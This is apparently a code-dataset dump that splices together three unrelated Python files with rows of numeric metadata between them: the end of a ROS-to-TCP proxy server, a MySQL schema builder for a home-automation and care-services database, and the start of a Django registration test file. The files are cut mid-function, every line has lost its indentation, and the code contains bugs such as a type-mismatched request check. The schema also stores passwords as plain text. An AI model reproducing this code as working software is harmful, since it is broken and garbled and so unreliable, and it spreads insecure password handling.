client.send_goal(goal,feedback_cb=cbp.feedback_cb,done_cb=cbp.done_cb,active_cb=cbp.active_cb)
return cbp.requestID
def subscribe(topicName,msgType,varName):
print "SUBSCRIBE_TO:", topicName, msgType, varName
subscriberVar[topicName] = varName
#rospy.Subscriber(topicName.replace("/",""), msg_conv.rosClassMap.get(msgType), callback)
cbp = SubscriberCallbackProvider(topicName)
rospy.Subscriber(topicName, msg_conv.rosClassMap.get(msgType), cbp.callback)
def publish(topicName,msgType):
#publishers[topicName] = rospy.Publisher(topicName.replace("/",""), msg_conv.rosClassMap.get(msgType), queue_size=10)
publishers[topicName] = rospy.Publisher(topicName, msg_conv.rosClassMap.get(msgType), queue_size=10)
publisherMsg[topicName] = msgType
def send_msg(topicName,msg):
publishers[topicName].publish(msg_conv.create_ros_msg_from_str(msg)[1])
def signal_handler(signal, frame):
print('Caught Ctrl+C. Closing socket...')
conn.close()
s.close()
sys.exit(0)
def ros_service_call(arg_msgs):
request = msg_conv.create_ros_msg_from_str(arg_msgs)[1]
service_name = arg_msgs[1:].split(" ")[0]
rospy.wait_for_service(service_name)
try:
serviceProxy = rospy.ServiceProxy(service_name, ROSMessageConversion.rosServiceMap[service_name])
print "Request:\n", request
response = serviceProxy.call(request)
responseStr = ROSMessageConversion.get_str_from_ros_msg("response",response)
#responseStr = ROSMessageConversion.split(responseStr[1:len(responseStr)-1])[2]
print "Response:\n",responseStr
return responseStr
except rospy.ServiceException, e:
print "Service call failed: %s"%e
signal.signal(signal.SIGINT, signal_handler)
TCP_IP = '127.0.0.1'
TCP_PORT = 6790
BUFFER_SIZE = 1024
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((TCP_IP, TCP_PORT))
s.listen(1)
rospy.init_node("SpiderPlanROSProxy", anonymous=True)
ros_namespace = rospy.get_namespace()
print ros_namespace
SUBSCRIBE_TO = 0
PUBLISH_TO = 1
READ_MSG = 2
SEND_MSG = 3
SERVICE_CALL = 4
REGISTER_ACTION = 5
SEND_GOAL = 6
HAS_STARTED = 7
HAS_FINISHED = 8
splitStr = "<//>"
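# Wire-format sketch (hedged, inferred from the handlers below): each request
# is one newline-terminated line of splitStr-separated fields whose first
# field is a request-type code from above, e.g. a SUBSCRIBE_TO request could
# look like "0<//>odom<//>Odometry<//>pose" (the topic, message type and
# variable names here are illustrative, not taken from a real deployment).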
while 1:
#print "Waiting..."
conn, addr = s.accept()
startAll = time.time()
#print 'Connection address:', addr
data = ""
while not "\n" in data:
data += conn.recv(BUFFER_SIZE)
data = data.replace("\n","")
print 'Request:', data.replace(splitStr,"|")
reqType = int(data.split(splitStr)[0])
returnMessage = ""
if reqType == SUBSCRIBE_TO:
topicName = ros_namespace + data.split(splitStr)[1]
topicName = topicName.replace("//", "/")
msgType = data.split(splitStr)[2]
varName = data.split(splitStr)[3]
subscribe(topicName,msgType,varName)
returnMessage = "<OK>"
elif reqType == PUBLISH_TO:
topicName = ros_namespace + "/"+data.split(splitStr)[1]
topicName = topicName.replace("//", "/")
msgType = data.split(splitStr)[2]
publish(topicName,msgType)
returnMessage = "<OK>"
elif reqType == READ_MSG:
topicName = ros_namespace + data.split(splitStr)[1]
if topicName in lastMessage.keys():
returnMessage = lastMessage[topicName]
lastMessage[topicName] = "<NONE>"
else:
returnMessage = "<NONE>"
elif reqType == SEND_MSG:
topicName = ros_namespace + data.split(splitStr)[1]
#topicName = topicName.replace("//", "/")
msg = data.split(splitStr)[2]
send_msg(topicName,msg)
returnMessage = "<OK>"
elif reqType == SERVICE_CALL:
request = data.split(splitStr)[1]
returnMessage = ros_service_call(request)
elif reqType == REGISTER_ACTION:
server_name = data.split(splitStr)[1]
action_name = data.split(splitStr)[2]
reg_simple_action_client(server_name,action_name)
returnMessage = "<OK>"
elif reqType == SEND_GOAL:
server_name = data.split(splitStr)[1]
action_name = data.split(splitStr)[2]
goal_msg_str = data.split(splitStr)[3]
requestID = send_goal(server_name,action_name,goal_msg_str)
returnMessage = str(requestID)
elif reqType == HAS_STARTED:
requestID = int(data.split(splitStr)[1])
if (requestID,"active") in lastMessage.keys():
returnMessage = "true"
else:
returnMessage = "false"
elif reqType == HAS_FINISHED:
requestID = int(data.split(splitStr)[1])
if (requestID,"done") in lastMessage.keys():
returnMessage = lastMessage[(requestID,"done")]
else:
returnMessage = "false"
elif reqType == "get_feedback":
requestID = int(data.split(splitStr)[1])
if (requestID,"feedback") in lastMessage.keys():
returnMessage = lastMessage[(requestID,"feedback")]
else:
returnMessage = "<NONE>"
conn.send(returnMessage)
conn.close()
endAll = time.time()
print 'Response: %s (took %.2fs)' % (returnMessage,endAll-startAll)
| 29.38403 | 118 | 0.749482 | 1,021 | 7,728 | 5.513222 | 0.260529 | 0.02878 | 0.054361 | 0.031977 | 0.245337 | 0.20803 | 0.167525 | 0.13537 | 0.077101 | 0.063599 | 0 | 0.010435 | 0.131988 | 7,728 | 262 | 119 | 29.496183 | 0.828712 | 0.200699 | 0 | 0.170455 | 0 | 0 | 0.051382 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.073864 | null | null | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69c0ea03d21d79afcf9d113b44197d452321d747 | 16,034 | py | Python | Createmodele_V13_1.1.py | pad-awan/domotiquesante | c91d97065bfcf9816367263266c608cfdc0c8009 | [
"CNRI-Python"
] | null | null | null | Createmodele_V13_1.1.py | pad-awan/domotiquesante | c91d97065bfcf9816367263266c608cfdc0c8009 | [
"CNRI-Python"
] | null | null | null | Createmodele_V13_1.1.py | pad-awan/domotiquesante | c91d97065bfcf9816367263266c608cfdc0c8009 | [
"CNRI-Python"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 09 22:25:07 2019
@author: arnaudhub
"""
#import pandas as pd
from sqlalchemy import create_engine
from sqlalchemy.sql import text
import configparser, os
from urllib import parse
#import sql.connector
config = configparser.ConfigParser()
config.read_file(open(os.path.expanduser("~/Bureau/OBJDOMO.cnf")))
DB = "OBJETDOMO_V13_1.1?charset=utf8"
CNF="OBJDOMO"
engine = create_engine("mysql://%s:%s@%s/%s" % (config[CNF]['user'], parse.quote_plus(config[CNF]['password']), config[CNF]['host'], DB))
user = config['OBJDOMO']['user']
password=config['OBJDOMO']['password']
import mysql.connector
from mysql.connector import Error
try:
connection = mysql.connector.connect(host="127.0.0.1",
database="OBJETDOMO_V13_1.1",
user=user,
password=password)
cursor = connection.cursor()
cursor.execute("""SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;""")
cursor.execute("""SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;""")
cursor.execute("""SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';""")
cursor.execute("""DROP SCHEMA IF EXISTS `OBJETDOMO_V13_1.1`;""")
print("DROP SCHEMA")
cursor.execute("""CREATE SCHEMA IF NOT EXISTS `OBJETDOMO_V13_1.1` DEFAULT CHARACTER SET utf8 ;""")
cursor.execute("""USE `OBJETDOMO_V13_1.1`;""")
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_A_TYPE_ADRESSE_TAD` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_A_TYPE_ADRESSE_TAD` (
`TAD_ID` INT NOT NULL AUTO_INCREMENT,
`TAD_LIBELLE` VARCHAR(45) NOT NULL,
PRIMARY KEY (`TAD_ID`))
ENGINE = InnoDB;""")
print("T_A_TYPE_ADRESSE_TAD Table created successfully ")
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_GENRE_GEN` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_GENRE_GEN` (
`GEN_ID` INT NOT NULL AUTO_INCREMENT,
`GEN_LIBELLE` VARCHAR(16) NOT NULL,
PRIMARY KEY (`GEN_ID`))
ENGINE = InnoDB;""")
print("T_R_GENRE_GEN Table created successfully ")
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_A_STATUT_STT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_A_STATUT_STT` (
`STT_ID` INT NOT NULL AUTO_INCREMENT,
`STT_LIBELLE` VARCHAR(45) NOT NULL,
`STT_TYPE` VARCHAR(45) NOT NULL,
PRIMARY KEY (`STT_ID`))
ENGINE = InnoDB;""")
print("T_A_STATUT_STT Table created successfully ")
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_PERSONNEPHYSIQUE_PRS` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_PERSONNEPHYSIQUE_PRS` (
`PRS_ID` INT NOT NULL AUTO_INCREMENT,
`PRS_NOM` VARCHAR(40) NOT NULL,
`PRS_PRENOM` VARCHAR(40) NOT NULL,
`GEN_ID` INT NOT NULL,
`PRS_NOTES` VARCHAR(300) NULL,
`STT_ID` INT NOT NULL,
PRIMARY KEY (`PRS_ID`),
INDEX `fk_TE_PERSONNE_PRS_1_idx` (`GEN_ID` ASC),
INDEX `fk_TE_PERSONNE_PRS_2_idx` (`STT_ID` ASC),
INDEX `index4` (`PRS_NOM` ASC, `PRS_PRENOM` ASC),
CONSTRAINT `fk_TE_PERSONNE_PRS_1`
FOREIGN KEY (`GEN_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_R_GENRE_GEN` (`GEN_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TE_PERSONNE_PRS_2`
FOREIGN KEY (`STT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_A_STATUT_STT` (`STT_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_E_PERSONNEPHYSIQUE_PRS Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_A_VILLE_CITY` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_A_VILLE_CITY` (
`CITY_ID` INT NOT NULL AUTO_INCREMENT,
`CITY_CODEPOSTAL` CHAR(5) NOT NULL,
`CITY_COMMUNE` VARCHAR(60) NOT NULL,
PRIMARY KEY (`CITY_ID`),
INDEX `index2` (`CITY_CODEPOSTAL` ASC, `CITY_COMMUNE` ASC))
ENGINE = InnoDB;""")
print("T_A_VILLE_CITY Table created successfully ")
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_ADRESSEPOSTALE_ADR` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_ADRESSEPOSTALE_ADR` (
`ADR_ID` INT NOT NULL AUTO_INCREMENT,
`ADR_VOIEPRINCIPALE` VARCHAR(38) NOT NULL,
`ADR_COMPLEMENTIDENTIFICATION` VARCHAR(38) NOT NULL,
`CITY_ID` INT NOT NULL,
`TAD_ID` INT NOT NULL COMMENT ' ',
PRIMARY KEY (`ADR_ID`),
INDEX `fk_TE_ADRESSE_ADR_1_idx` (`TAD_ID` ASC),
INDEX `fk_TE_ADRESSEPOSTALE_ADR_1_idx` (`CITY_ID` ASC),
CONSTRAINT `fk_TE_ADRESSE_ADR_1`
FOREIGN KEY (`TAD_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_A_TYPE_ADRESSE_TAD` (`TAD_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TE_ADRESSEPOSTALE_ADR_1`
FOREIGN KEY (`CITY_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_A_VILLE_CITY` (`CITY_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_E_ADRESSEPOSTALE_ADR Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_TYPEPRODUIT_TPDT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_TYPEPRODUIT_TPDT` (
`TPDT_ID` INT NOT NULL AUTO_INCREMENT,
`TPDT_CATEGORIE` VARCHAR(60) NULL,
PRIMARY KEY (`TPDT_ID`))
ENGINE = InnoDB;""")
print('T_R_TYPEPRODUIT_TPDT Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_PRODUIT_PDT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_PRODUIT_PDT` (
`PDT_SERIALNUMBER` INT NOT NULL AUTO_INCREMENT,
`PDT_NOM` VARCHAR(45) NOT NULL,
`PDT_MARQUE` VARCHAR(45) NOT NULL,
`PDT_VALEUR` VARCHAR(45) NOT NULL,
`PDT_HEURE` VARCHAR(45) NOT NULL,
`PDT_DUREE` VARCHAR(45) NOT NULL,
`PDT_SOURCE` VARCHAR(45) NOT NULL,
`PDT_REGLE` VARCHAR(45) NOT NULL,
`TPDT_ID` INT NOT NULL,
PRIMARY KEY (`PDT_SERIALNUMBER`),
INDEX `index2` (`PDT_NOM` ASC, `PDT_MARQUE` ASC),
INDEX `fk_TE_PRODUIT_PDT_1_idx` (`TPDT_ID` ASC),
CONSTRAINT `fk_TE_PRODUIT_PDT_1`
FOREIGN KEY (`TPDT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_R_TYPEPRODUIT_TPDT` (`TPDT_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_E_PRODUIT_PDT Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_AUTHENTIFICATION_AUTH` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_AUTHENTIFICATION_AUTH` (
`AUTH_ID` INT NOT NULL AUTO_INCREMENT,
`AUTH_USERNAME` VARCHAR(45) NOT NULL,
`AUTH_PASSWORD` VARCHAR(45) NOT NULL,
`PRS_ID` INT NOT NULL,
PRIMARY KEY (`AUTH_ID`),
INDEX `index2` (`AUTH_USERNAME` ASC, `AUTH_PASSWORD` ASC),
INDEX `fk_TR_AUTHENTIFICATION_AUTH_1_idx` (`PRS_ID` ASC),
CONSTRAINT `fk_TR_AUTHENTIFICATION_AUTH_1`
FOREIGN KEY (`PRS_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PERSONNEPHYSIQUE_PRS` (`PRS_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_R_AUTHENTIFICATION_AUTH Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_LOCALISATIONPRODUIT_LOC` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_LOCALISATIONPRODUIT_LOC` (
`LOC_ID` INT NOT NULL AUTO_INCREMENT,
`LOC_LIBELLE` VARCHAR(45) NOT NULL,
`LOC_TYPE` VARCHAR(45) NOT NULL,
`LOC_NOTES` VARCHAR(300) NULL,
PRIMARY KEY (`LOC_ID`),
INDEX `index2` (`LOC_LIBELLE` ASC, `LOC_TYPE` ASC))
ENGINE = InnoDB;""")
print('T_E_LOCALISATIONPRODUIT_LOC Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_TYPEINTERVENTION_TPI` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_TYPEINTERVENTION_TPI` (
`TPI_ID` INT NOT NULL AUTO_INCREMENT,
`TPI_LIBELLE` VARCHAR(45) NOT NULL,
`TPI_TYPE` VARCHAR(45) NOT NULL,
PRIMARY KEY (`TPI_ID`),
INDEX `index2` (`TPI_LIBELLE` ASC, `TPI_TYPE` ASC))
ENGINE = InnoDB;""")
print('T_R_TYPEINTERVENTION_TPI Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_A_AUTONOMIE_AUT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_A_AUTONOMIE_AUT` (
`AUT_ID` INT NOT NULL AUTO_INCREMENT,
`AUT_DEPENDANCE` VARCHAR(5) NOT NULL,
`AUT_DEFINITION` VARCHAR(105) NOT NULL,
PRIMARY KEY (`AUT_ID`),
INDEX `index2` (`AUT_DEPENDANCE` ASC, `AUT_DEFINITION` ASC))
ENGINE = InnoDB;""")
print('T_A_AUTONOMIE_AUT Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_BENEFICIAIRE_CTT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_BENEFICIAIRE_CTT` (
`CTT_ID` INT NOT NULL AUTO_INCREMENT,
`CTT_INTITULECONTRAT` VARCHAR(45) NOT NULL,
`CTT_REFCONTRAT` VARCHAR(45) NOT NULL,
`AUT_ID` INT NOT NULL,
`CTT_DEBUTCONTRAT` DATE NOT NULL,
`CTT_DATENAISSANCEBENEFICIAIRE` DATE NOT NULL,
`CTT_TEL` VARCHAR(45) NULL,
`PRS_ID` INT NOT NULL,
PRIMARY KEY (`CTT_ID`),
INDEX `fk_TR_CONTRAT_CTT_1_idx` (`AUT_ID` ASC),
INDEX `fk_TR_CONTRATBENEFICIAIRE_CTT_TE_PERSONNE_PRS1_idx` (`PRS_ID` ASC),
CONSTRAINT `fk_TR_CONTRAT_CTT_1`
FOREIGN KEY (`AUT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_A_AUTONOMIE_AUT` (`AUT_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TE_PERSONNE_PRS1`
FOREIGN KEY (`PRS_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PERSONNEPHYSIQUE_PRS` (`PRS_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_R_BENEFICIAIRE_CTT Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_INTERVENTION_INT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_INTERVENTION_INT` (
`INT_ID` INT NOT NULL AUTO_INCREMENT,
`ADR_ID` INT NOT NULL,
`INT_DATEINTERVENTION` DATE NOT NULL,
`INT_PRESENCEANIMALMOYEN` TINYINT(1) NOT NULL DEFAULT 0,
`NOTES` VARCHAR(300) NULL,
`CTT_ID` INT NOT NULL,
`TPI_ID` INT NOT NULL,
PRIMARY KEY (`INT_ID`),
INDEX `fk_TR_INTERVENTION_INT_1_idx` (`TPI_ID` ASC),
INDEX `fk_TR_INTERVENTION_INT_2_idx` (`CTT_ID` ASC),
CONSTRAINT `fk_TR_INTERVENTION_INT_1`
FOREIGN KEY (`TPI_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_R_TYPEINTERVENTION_TPI` (`TPI_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TR_INTERVENTION_INT_2`
FOREIGN KEY (`CTT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_R_BENEFICIAIRE_CTT` (`CTT_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_E_INTERVENTION_INT Table created successfully')
##############
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_INTERCONNEXION_INTCO` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_INTERCONNEXION_INTCO` (
`INTCO_ID` INT NOT NULL AUTO_INCREMENT,
`DATEEVENEMENT` DATETIME(6) NOT NULL,
`VALEUR` VARCHAR(45) NOT NULL,
`PDT_ID` INT NOT NULL,
`INTCO_ADRESSEIP` VARCHAR(20) NOT NULL,
PRIMARY KEY (`INTCO_ID`),
INDEX `fk_TR_COMMUNICATION_COM_1_idx` (`PDT_ID` ASC),
CONSTRAINT `fk_TR_COMMUNICATION_COM_1`
FOREIGN KEY (`PDT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PRODUIT_PDT` (`PDT_SERIALNUMBER`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_R_INTERCONNEXION_INTCO Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_J_CTT_ADR_PDT_INT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_J_CTT_ADR_PDT_INT` (
`PDT_SERIALNUMBER` INT NOT NULL,
`INT_ID` INT NOT NULL,
`NOTES` VARCHAR(300) NULL,
`LOC_ID` INT NOT NULL,
`CTT_ID` INT NOT NULL,
`ADR_ID` INT NOT NULL,
INDEX `fk_TJ_CTT_ADR_PDT_INT_2_idx` (`LOC_ID` ASC),
INDEX `fk_TJ_CTT_ADR_PDT_INT_3_idx` (`PDT_SERIALNUMBER` ASC),
INDEX `fk_TJ_CTT_ADR_PDT_INT_4_idx` (`INT_ID` ASC),
INDEX `fk_TJ_CTT_ADR_PDT_INT_5_idx` (`CTT_ID` ASC),
INDEX `fk_TJ_CTT_ADR_PDT_INT_1_idx` (`ADR_ID` ASC),
CONSTRAINT `fk_TJ_CTT_ADR_PDT_INT_2`
FOREIGN KEY (`LOC_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_LOCALISATIONPRODUIT_LOC` (`LOC_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TJ_CTT_ADR_PDT_INT_3`
FOREIGN KEY (`PDT_SERIALNUMBER`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PRODUIT_PDT` (`PDT_SERIALNUMBER`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TJ_CTT_ADR_PDT_INT_4`
FOREIGN KEY (`INT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_INTERVENTION_INT` (`INT_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TJ_CTT_ADR_PDT_INT_5`
FOREIGN KEY (`CTT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_R_BENEFICIAIRE_CTT` (`CTT_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TJ_CTT_ADR_PDT_INT_1`
FOREIGN KEY (`ADR_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_ADRESSEPOSTALE_ADR` (`ADR_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print("table jointure T_J_CTT_ADR_PDT_INT créée ")
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_PERSONNEMORALE_PEM` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_PERSONNEMORALE_PEM` (
`PEM_NUMEROSIREN` INT NOT NULL,
`PEM_RAISONSOCIALE` VARCHAR(45) NOT NULL,
`PEM_TYPEACTIVITE` VARCHAR(60) NOT NULL,
`PEM_SIRET` VARCHAR(45) NULL,
PRIMARY KEY (`PEM_NUMEROSIREN`),
INDEX `index2` (`PEM_RAISONSOCIALE` ASC))
ENGINE = InnoDB;""")
print('T_E_PERSONNEMORALE_PEM créée')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_J_EMPLOYE_EMP` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_J_EMPLOYE_EMP` (
`EMP_ID` INT NOT NULL,
`PEM_ID` INT NOT NULL,
`INT_ID` INT NOT NULL,
`EMP_TELEPHONE` CHAR(15) NOT NULL,
`EMP_EMAIL` VARCHAR(45) NOT NULL,
INDEX `fk_TE_PRESTATAIRE_PREST_2_idx` (`PEM_ID` ASC),
INDEX `fk_TE_PRESTATAIRE_PREST_3_idx` (`INT_ID` ASC),
CONSTRAINT `fk_TE_PRESTATAIRE_PREST_1`
FOREIGN KEY (`EMP_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PERSONNEPHYSIQUE_PRS` (`PRS_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TE_PRESTATAIRE_PREST_2`
FOREIGN KEY (`PEM_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PERSONNEMORALE_PEM` (`PEM_NUMEROSIREN`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TE_PRESTATAIRE_PREST_3`
FOREIGN KEY (`INT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_INTERVENTION_INT` (`INT_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_J_EMPLOYE_EMP Table created successfully')
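# Hedged verification sketch: list the tables that now exist so a silently
# skipped DDL statement is easy to spot. SHOW TABLES is standard MySQL; the
# print format below is an assumption, not part of the original schema script.
cursor.execute("""SHOW TABLES;""")
print("Tables created: {}".format([t[0] for t in cursor.fetchall()]))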
cursor.execute("""SET SQL_MODE=@OLD_SQL_MODE;""")
cursor.execute("""SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;""")
cursor.execute("""SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;""")
except mysql.connector.Error as error:
print("Failed to create table in MySQL: {}".format(error))
finally:
if (connection.is_connected()):
cursor.close()
connection.close()
print("MySQL connection is closed")
| 43.102151 | 137 | 0.674192 | 2,306 | 16,034 | 4.364267 | 0.095837 | 0.051471 | 0.077504 | 0.083466 | 0.687003 | 0.590421 | 0.50626 | 0.482015 | 0.459161 | 0.419316 | 0 | 0.030988 | 0.205002 | 16,034 | 371 | 138 | 43.218329 | 0.758531 | 0.008607 | 0 | 0.248466 | 0 | 0 | 0.850167 | 0.247306 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.015337 | 0.018405 | 0 | 0.018405 | 0.064417 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69c5c7a7d8c414585a90c6896cbf35b9061ae450 | 6,136 | py | Python | authors/apps/authentication/tests/test_register.py | andela/ah-code-titans | 4f1fc77c2ecdf8ca15c24327d39fe661eac85785 | [
"BSD-3-Clause"
] | null | null | null | authors/apps/authentication/tests/test_register.py | andela/ah-code-titans | 4f1fc77c2ecdf8ca15c24327d39fe661eac85785 | [
"BSD-3-Clause"
] | 20 | 2018-11-26T16:22:46.000Z | 2018-12-21T10:08:25.000Z | authors/apps/authentication/tests/test_register.py | andela/ah-code-titans | 4f1fc77c2ecdf8ca15c24327d39fe661eac85785 | [
"BSD-3-Clause"
] | 3 | 2019-01-24T15:39:42.000Z | 2019-09-25T17:57:08.000Z | from rest_framework import status
from django.urls import reverse
from django.utils.encoding import force_bytes
from django.utils.http import urlsafe_base64_encode
from ..models import User
from ..token import account_activation_token
# local import
from authors.base_test_config import TestConfiguration
class TestRegister(TestConfiguration):
""" Test suite for user registration """
def register_user(self, data):
""" function register a new user """
return self.client.post(
reverse("create_user"),
data,
content_type='application/json'
)
def test_registration_email_verification(self):
response_details = self.register_user(self.new_user)
user_details = User.objects.get(username=self.new_user['user']['username'])
pk = urlsafe_base64_encode(force_bytes(user_details.id)).decode()
token = account_activation_token.make_token(self.new_user)
activate_url = 'http://localhost:8000/api/activate/account/{pk}/{token}'.format(pk=pk, token=token)
response = self.client.get(
activate_url,
content_type='application/json'
)
self.assertEqual(response.status_code, status.HTTP_302_FOUND)
def test_empty_username(self):
""" test empty username """
self.new_user["user"]["username"] = ''
response = self.register_user(self.new_user)
self.assertEqual(
response.status_code,
status.HTTP_400_BAD_REQUEST
)
self.assertEqual(
response.data["errors"]["username"][0],
"This field may not be blank."
)
def test_invalid_email(self):
""" test invalid email """
self.new_user["user"]["email"] = 'kimameß'
response = self.register_user(self.new_user)
self.assertEqual(
response.status_code,
status.HTTP_400_BAD_REQUEST
)
self.assertEqual(
response.data["errors"]["email"][0],
"Enter a valid email address."
)
def test_empty_email(self):
""" test invalid email """
self.new_user["user"]["email"] = ''
response = self.register_user(self.new_user)
self.assertEqual(
response.status_code,
status.HTTP_400_BAD_REQUEST
)
self.assertEqual(
response.data["errors"]["email"][0],
"This field may not be blank."
)
def test_invalid_password(self):
""" test invalid password """
self.new_user["user"]["password"] = 'rtryyr'
response = self.register_user(self.new_user)
